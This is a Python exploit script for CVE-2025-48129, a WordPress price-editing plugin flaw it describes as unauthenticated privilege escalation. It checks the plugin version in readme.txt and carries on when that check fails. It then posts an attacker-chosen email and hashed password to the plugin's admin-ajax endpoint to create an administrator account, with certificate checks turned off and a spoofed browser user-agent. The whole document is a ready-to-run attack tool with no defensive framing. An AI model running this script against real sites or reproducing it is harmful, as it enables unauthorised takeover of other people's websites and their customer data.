import argparse
import requests
import hashlib
import time
from urllib.parse import urljoin

requests.packages.urllib3.disable_warnings()

# Exploit By: Nxploited ( Khaled_alenazi)

def format_url(url):
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url if url.endswith("/") else url + "/"

def check_version(base_url):
    readme_url = urljoin(base_url, "wp-content/plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light/readme.txt")
    print("[*] Checking plugin version...")
    try:
        response = requests.get(readme_url, timeout=10, verify=False)
        if response.status_code == 200:
            if "Stable tag:" in response.text:
                for line in response.text.splitlines():
                    if "Stable tag:" in line:
                        version = line.split("Stable tag:")[1].strip()
                        if version <= "2.4.37":
                            print("[*] Plugin version:", version)
                            print("[*] Vulnerable version detected. Exploiting...")
                            time.sleep(3)
                        else:
                            print("[*] Plugin is not vulnerable (version:", version + ")")
            else:
                print("[*] Plugin version not found in readme.txt. Proceeding with exploitation.")
        else:
            print("[*] readme.txt not accessible. Skipping version check.")
    except Exception:
        print("[*] Could not verify plugin version. Proceeding with exploitation.")

def exploit(base_url, email, password):
    hashed_pw = hashlib.md5(password.encode()).hexdigest()
    ajax_url = urljoin(base_url, "wp-admin/admin-ajax.php?action=sellingcommander-endpoint")

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    data = {
        "scemail": email,
        "consumer_key": hashed_pw,
        "consumer_secret": "xyz"
    }

    try:
        response = requests.post(ajax_url, data=data, headers=headers, verify=False, timeout=15)
        if response.status_code == 200:
            if "rest_no_route" in response.text or "No route was found" in response.text:
                print("[+] Exploitation successful!")
            else:
                print("[+] Exploit sent. Review the site manually.")
        else:
            print("[-] Exploitation failed (HTTP", response.status_code, ")")
    except Exception as e:
        print("[-] Error sending request:", str(e))
        return

    print("\n[*] Login credentials:")
    print("    Username:", email)
    print("    Password:", hashed_pw)
    print(f"\n[*] If login fails, reset the password manually via:\n    {urljoin(base_url, 'wp-login.php?action=lostpassword')}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://site.com/)")
    parser.add_argument("-mail", "--mail", required=True, help="Email for the new Admin account")
    parser.add_argument("-p", "--password", default="nxploitadmin", help="Password to set (default: nxploitadmin)")

    args = parser.parse_args()
    base_url = format_url(args.url)

    check_version(base_url)
    exploit(base_url, args.mail, args.password)